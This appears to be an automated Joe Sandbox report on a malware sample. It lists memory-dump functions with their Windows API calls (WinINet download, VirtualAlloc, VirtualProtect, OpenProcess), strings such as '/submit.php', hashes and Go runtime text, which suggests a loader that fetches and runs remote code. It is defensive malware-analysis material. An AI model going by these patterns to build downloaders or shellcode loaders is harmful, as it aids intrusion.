Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CountTickmalloc$_snprintffree$Thread_errnoshutdown$AllocCreateExitHeapLocalSleepTime_callnewhclosesocketrealloc
String ID: /submit.php
API String ID: 864391129-1804779596
Opcode ID: f32a6c39e735c114815da34ed31be4442a001b255392baeff4aaf8f228ef7111
Instruction ID: c4a1287572384d6bf1c0330893ca9799907108471940eb8f001b01684c833f30
Opcode Fuzzy Hash: f32a6c39e735c114815da34ed31be4442a001b255392baeff4aaf8f228ef7111
Instruction Fuzzy Hash: D7B18B7160824B46EB57FB71B4527FA2AB1AFD4780F614434A9CD4F6C6DE38CB098722

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DE2BE0128 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 0000017DE2BE0143
VirtualAlloc.KERNELBASE ref: 0000017DE2BE0328
InternetReadFile.WININET(0000017DE2BE0136,0000017DE2BE0136), ref: 0000017DE2BE0346

Strings

U.;, xrefs: 0000017DE2BE013E

Memory Dump Source

Source File: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DE2BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17de2be0000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AllocFileHttpInternetOpenReadRequestVirtual
String ID: U.;
API String ID: 1187293180-4213443877
Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
Instruction ID: 306b23a77536648a1b792322f5eb5bd3cdcd297859cedcb557f686448aa25760
Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
Instruction Fuzzy Hash: D311CE7070CC0D0BF61980AE7C5A77A21DAD7DC321F24812FB44ED72C9ED94CC82402A

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DE2BE00D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
librarynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000017DE2BE00ED
InternetOpenA.WININET(00000000,00000000), ref: 0000017DE2BE0105

Strings

wini, xrefs: 0000017DE2BE00D6

Memory Dump Source

Source File: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DE2BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17de2be0000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: InternetLibraryLoadOpen
String ID: wini
API String ID: 2559873147-1606035523
Opcode ID: a6bf2f82bce75ef1a8110bbb4bd15554810678d8cdf2ab1143a359ca184b0370
Instruction ID: be2dfe12f7a6501dcb3640900f644649840e494da42511bf4f10a56941dbffd8
Opcode Fuzzy Hash: a6bf2f82bce75ef1a8110bbb4bd15554810678d8cdf2ab1143a359ca184b0370
Instruction Fuzzy Hash: 1FF0527090C98C5EE32E2930780A37A7AB9CB0A305F25866EE0C7DA5DACDA01C418163

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72EC3C Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000017DEA72ED34: WSAStartup.WS2_32 ref: 0000017DEA72ED52

WSASocketA.WS2_32 ref: 0000017DEA72EC6A
WSAIoctl.WS2_32 ref: 0000017DEA72ECB7
closesocket.WS2_32 ref: 0000017DEA72ED16

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: IoctlSocketStartupclosesocket
String ID:
API String ID: 365704328-0
Opcode ID: 952a6e3a5161aab294e5687c842b6be410eeabfc0734eca94b1b33ec9b4c3f50
Instruction ID: 6a77fc51806fe87614ddc9551a8d2f4f5f5e696ec7cbf19f08f4d2d4655b1ae0
Opcode Fuzzy Hash: 952a6e3a5161aab294e5687c842b6be410eeabfc0734eca94b1b33ec9b4c3f50
Instruction Fuzzy Hash: CF21A07260878542E721DF24B4407AABBB5FBC8BE4F544635EADD0BB85DF38C6458B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DE2BE02E7 Relevance: 3.1, APIs: 2, Instructions: 57
memoryfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0000017DE2BE0328
InternetReadFile.WININET(0000017DE2BE0136,0000017DE2BE0136), ref: 0000017DE2BE0346

Memory Dump Source

Source File: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DE2BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17de2be0000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AllocFileInternetReadVirtual
String ID:
API String ID: 3591508208-0
Opcode ID: 8227a736b0f4f95c36cd9a1cc1d4aafdfcae872ae3987503b9d8e65fe5cd3959
Instruction ID: 2d25bb5abf1c5cab9d01bddfbbcc069effd408d1e01a846052321018ce2f1710
Opcode Fuzzy Hash: 8227a736b0f4f95c36cd9a1cc1d4aafdfcae872ae3987503b9d8e65fe5cd3959
Instruction Fuzzy Hash: 9801A43030C94E0BE71A59E9BCA57FA22E9DB48354F34402EF44ED72CADE58CC978259

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA731458 Relevance: 3.1, APIs: 2, Instructions: 57
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htonl.WS2_32 ref: 0000017DEA73148C
VirtualProtect.KERNEL32 ref: 0000017DEA73151B

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: ProtectVirtualhtonl
String ID:
API String ID: 2902677218-0
Opcode ID: 4b12a6d8d4904ce74f9c5145ffaca99b49c225ea4d5dd63d56719739f63b212b
Instruction ID: 8da7929eebe4b696346408d45da7f0861a25197b5d60d1f972ab2e9363712ab5
Opcode Fuzzy Hash: 4b12a6d8d4904ce74f9c5145ffaca99b49c225ea4d5dd63d56719739f63b212b
Instruction Fuzzy Hash: 0921303231868AD2EB62EF12F4807EA6370FBC8784F5544329ACD4B745DE38C6498B41

Uniqueness

Uniqueness Score: -1.00%

Function 0083C280 Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumChildWindows.USER32 ref: 0083C2DC

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 33b54bf97a7912f954cb5ac1813d54e14e05c2a316259aa94b24e2224a416175
Instruction ID: 1bc2f15bf4e47cf16615bb867eef0bd3391373419be7ed0eda77d886ce0b6a03
Opcode Fuzzy Hash: 33b54bf97a7912f954cb5ac1813d54e14e05c2a316259aa94b24e2224a416175
Instruction Fuzzy Hash: 79F03776A11B8082DB21CB5AE9413297370F78DBE4F244216DE5DA7B24CB39E592C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA337853 Relevance: 1.4, APIs: 1, Instructions: 136
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0000017DEA3379A0

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction ID: 3d459ed1bc27a296d496ef107ed72bbf3c3898e69a82eb751863c649d1151171
Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction Fuzzy Hash: 0641C97061CB898FD785DB1CC488B6AB7F1FB98315F400A2DF49AC7260DB34D9858B02

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0000017DEA736C98 Relevance: 64.0, APIs: 32, Strings: 4, Instructions: 969COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 0000017DEA73A5E4
htonl.WS2_32 ref: 0000017DEA73A5F3
OpenProcess.KERNEL32 ref: 0000017DEA73A604
GetLastError.KERNEL32 ref: 0000017DEA73A612

Strings

%s%d%d%s%s%d, xrefs: 0000017DEA73765A
%s%d%d, xrefs: 0000017DEA7375C4
x86, xrefs: 0000017DEA73753F, 0000017DEA73762A
x64, xrefs: 0000017DEA73752A, 0000017DEA737538

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: htonl$ErrorLastOpenProcess
String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
API String ID: 3543785021-1833344708
Opcode ID: c8c97dfc55eba45ef1c6c6993464718e573ee33c36903e71c3618c37d8cddb68
Instruction ID: 4229546f98a6938705d6d5492a84990e22a9da1876287f4d6af8738a686e8b7c
Opcode Fuzzy Hash: c8c97dfc55eba45ef1c6c6993464718e573ee33c36903e71c3618c37d8cddb68
Instruction Fuzzy Hash: 5672CF31B1C64B82FA6BFB26B4513F912B1AFC5780FA64131D9CE4B795DE28C7498702

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7422B4 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000017DEA74230A
_errno.LIBCMT ref: 0000017DEA742311
_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA74231C

Strings

U, xrefs: 0000017DEA74287E

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: 887be5ca941d1e1bbf8005ee108c45f4cc0021591f9d338be499f64fbdbfcab3
Instruction ID: 2a272a034326e70427ce2dd3970acdd2338aa353a1f281baf27b8629ea487067
Opcode Fuzzy Hash: 887be5ca941d1e1bbf8005ee108c45f4cc0021591f9d338be499f64fbdbfcab3
Instruction Fuzzy Hash: 4512E33221864B86EB22EF24E4443FEA7B1FBD4784F500125DACD4BA99CF39C655CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73ED3C Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0000017DEA73ED9D

Part of subcall function 0000017DEA73E220: _getptd.LIBCMT ref: 0000017DEA73E236
Part of subcall function 0000017DEA73E220: __updatetlocinfo.LIBCMT ref: 0000017DEA73E26B
Part of subcall function 0000017DEA73E220: __updatetmbcinfo.LIBCMT ref: 0000017DEA73E292

_errno.LIBCMT ref: 0000017DEA73EDA2

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

_fileno.LIBCMT ref: 0000017DEA73EDCF

Part of subcall function 0000017DEA7417F4: _errno.LIBCMT ref: 0000017DEA7417FD
Part of subcall function 0000017DEA7417F4: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA741808

write_multi_char.LIBCMT ref: 0000017DEA73F40B
write_string.LIBCMT ref: 0000017DEA73F428
write_multi_char.LIBCMT ref: 0000017DEA73F445
write_string.LIBCMT ref: 0000017DEA73F4A4
write_string.LIBCMT ref: 0000017DEA73F4DB
write_multi_char.LIBCMT ref: 0000017DEA73F4FD
free.LIBCMT ref: 0000017DEA73F511
_isleadbyte_l.LIBCMT ref: 0000017DEA73F5E2
write_char.LIBCMT ref: 0000017DEA73F5F8
write_char.LIBCMT ref: 0000017DEA73F619
_errno.LIBCMT ref: 0000017DEA73F71C
_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73F727

Strings

, xrefs: 0000017DEA73F3DF
@, xrefs: 0000017DEA73EDBB

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3318157856-1077428164
Opcode ID: f8df11205d73aff79168b207964888485222e3fd07834b4b3d544df7ad576b6c
Instruction ID: 8bea5b07d7ed7cc976d5f7107e036d007a3e3744ce016605dba88953ae0b4e5f
Opcode Fuzzy Hash: f8df11205d73aff79168b207964888485222e3fd07834b4b3d544df7ad576b6c
Instruction Fuzzy Hash: 8252AF7220D64A85FB67FB15B5443FE6AF0AF817C4F664025DA8E4E694DE39CA08C702

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73E2C8 Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0000017DEA73E329

Part of subcall function 0000017DEA73E220: _getptd.LIBCMT ref: 0000017DEA73E236
Part of subcall function 0000017DEA73E220: __updatetlocinfo.LIBCMT ref: 0000017DEA73E26B
Part of subcall function 0000017DEA73E220: __updatetmbcinfo.LIBCMT ref: 0000017DEA73E292

_errno.LIBCMT ref: 0000017DEA73E32E

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

_fileno.LIBCMT ref: 0000017DEA73E35B

Part of subcall function 0000017DEA7417F4: _errno.LIBCMT ref: 0000017DEA7417FD
Part of subcall function 0000017DEA7417F4: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA741808

write_multi_char.LIBCMT ref: 0000017DEA73E98B
write_string.LIBCMT ref: 0000017DEA73E9A8
write_multi_char.LIBCMT ref: 0000017DEA73E9C5
write_string.LIBCMT ref: 0000017DEA73EA24
write_string.LIBCMT ref: 0000017DEA73EA5B
write_multi_char.LIBCMT ref: 0000017DEA73EA7D
free.LIBCMT ref: 0000017DEA73EA91
_isleadbyte_l.LIBCMT ref: 0000017DEA73EB62
write_char.LIBCMT ref: 0000017DEA73EB78
write_char.LIBCMT ref: 0000017DEA73EB99
_errno.LIBCMT ref: 0000017DEA73EC93
_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73EC9E

Strings

, xrefs: 0000017DEA73E95F

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3318157856-3916222277
Opcode ID: d2d0f6ff9d7b7a13e2b96cc577a047d14fe130a0d0a9348c75ce4f8fc2679a4f
Instruction ID: 57d25765bbc596e9446c5cb88828a3d75332169d906acb8f516b692184b1fb87
Opcode Fuzzy Hash: d2d0f6ff9d7b7a13e2b96cc577a047d14fe130a0d0a9348c75ce4f8fc2679a4f
Instruction Fuzzy Hash: AD52927260C64E85FB67EA15A4443FE6AF1BFE17C4F261025DACE4A6D4DF34CA488702

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33E183 Relevance: 32.5, APIs: 16, Strings: 2, Instructions: 1030COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0000017DEA33E1E4

Part of subcall function 0000017DEA33D667: _getptd.LIBCMT ref: 0000017DEA33D67D
Part of subcall function 0000017DEA33D667: __updatetlocinfo.LIBCMT ref: 0000017DEA33D6B2
Part of subcall function 0000017DEA33D667: __updatetmbcinfo.LIBCMT ref: 0000017DEA33D6D9

_errno.LIBCMT ref: 0000017DEA33E1E9

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

_fileno.LIBCMT ref: 0000017DEA33E216

Part of subcall function 0000017DEA340C3B: _errno.LIBCMT ref: 0000017DEA340C44
Part of subcall function 0000017DEA340C3B: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA340C4F

write_multi_char.LIBCMT ref: 0000017DEA33E852
write_string.LIBCMT ref: 0000017DEA33E86F
write_multi_char.LIBCMT ref: 0000017DEA33E88C
write_string.LIBCMT ref: 0000017DEA33E8EB
write_multi_char.LIBCMT ref: 0000017DEA33E944
free.LIBCMT ref: 0000017DEA33E958
_isleadbyte_l.LIBCMT ref: 0000017DEA33EA29
write_char.LIBCMT ref: 0000017DEA33EA3F
write_char.LIBCMT ref: 0000017DEA33EA60
_errno.LIBCMT ref: 0000017DEA33EB63
_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33EB6E

Strings

, xrefs: 0000017DEA33E826
@, xrefs: 0000017DEA33E202

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 2950348734-1077428164
Opcode ID: 07341e3732a2750f25fb6a453c6349766dbff6c117d6dfe3209b03da8e3e77c7
Instruction ID: d2ead9e8d6f4c2233f87a0ee82ad542633bae56b307602d7cc1d40f3f2a66b2c
Opcode Fuzzy Hash: 07341e3732a2750f25fb6a453c6349766dbff6c117d6dfe3209b03da8e3e77c7
Instruction Fuzzy Hash: 0562D63091C64E8AF76B9A98A4453F977F1FFE5310F34411ED4AB8B1E1DE249A0A8643

Uniqueness

Uniqueness Score: -1.00%

Function 0082E6A0 Relevance: 31.3, Strings: 24, Instructions: 1308COMMON

Download Yara Rule

Strings

: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPau_Cin_HauRegCloseKeySetFileTimeSignWri, xrefs: 0082F7F7
called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (: unknown pc CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_Gondi, xrefs: 0082F04F
unknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMappingWCuba Standard TimeFiji Standard TimeGC worker (, xrefs: 00830254
traceback stuck already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCu, xrefs: 0082F985
top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3, xrefs: 0082F815
traceback did not unwind completelytransport endpoint is not connected) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyzGo pointer stored into non-Go memoryUnable to determine system directoryaccessed d, xrefs: 0082F8EF
runtime., xrefs: 0082FD12
fp= is lr: of pc= sp: sp=) = ) m=+Inf-Inf: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCLEAFLisuMiaoModiNZDTNZSTNewaSASTThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabpiperootsbrksse3trueuint, xrefs: 0082FEFE
: unknown pc CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_GondiMapViewOfFileMasaram_GondiMende_KikakuiModule32NextWOld_HungarianRegDeleteKeyWRegEnumKeyExWRegEnumValueWRegOpenKeyExWRtlMoveMemoryVirtualUnlockWriteConsoleWbad flushGen bad map state, xrefs: 0082E95C
stack=[cgocheckcs deadlockfs gs no anodepollDescr10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBuftrigger=unkn, xrefs: 0082F865
gentraceback callback cannot be used with non-zero skipmheap.freeSpanLocked - invalid free of user arena chunkos: invalid use of WriteAt on file opened with O_APPENDfailed to allocate aligned heap memory; too many retriesin gcMark expecting to see gcphase as _, xrefs: 008302DC
gentraceback cannot trace user goroutine on its own stackruntime: checkmarks found unexpected unmarked object obj=addr range base and limit are not in the same memory segmentmanual span allocation called with non-manually-managed typeruntime: GetQueuedCompleti, xrefs: 008302CB
tracebackwbufSpans} stack=[ MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDep, xrefs: 008302BA
runtime: gs.state = schedtracesemacquiresetsockoptstackLargetracefree(tracegc()unknown pcws2_32.dll of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= sched, xrefs: 0082F7D9
] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabpiperootsbrksse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLati, xrefs: 0082F8A5
runtime: g runtime: p scheddetailsecur32.dllshell32.dllshort writetracealloc(unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s., xrefs: 0082E93E, 0082F00B
runtime: traceback stuck. pc=scanobject of a noscan objectsemacquire not on the G stackstring concatenation too longtimeBegin/EndPeriod not foundtoo many open files in system (types from different scopes) in prepareForSweep; sweepgen locals stack map entries , xrefs: 0082F91D
unknown pcws2_32.dll of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdo, xrefs: 0082E9C9
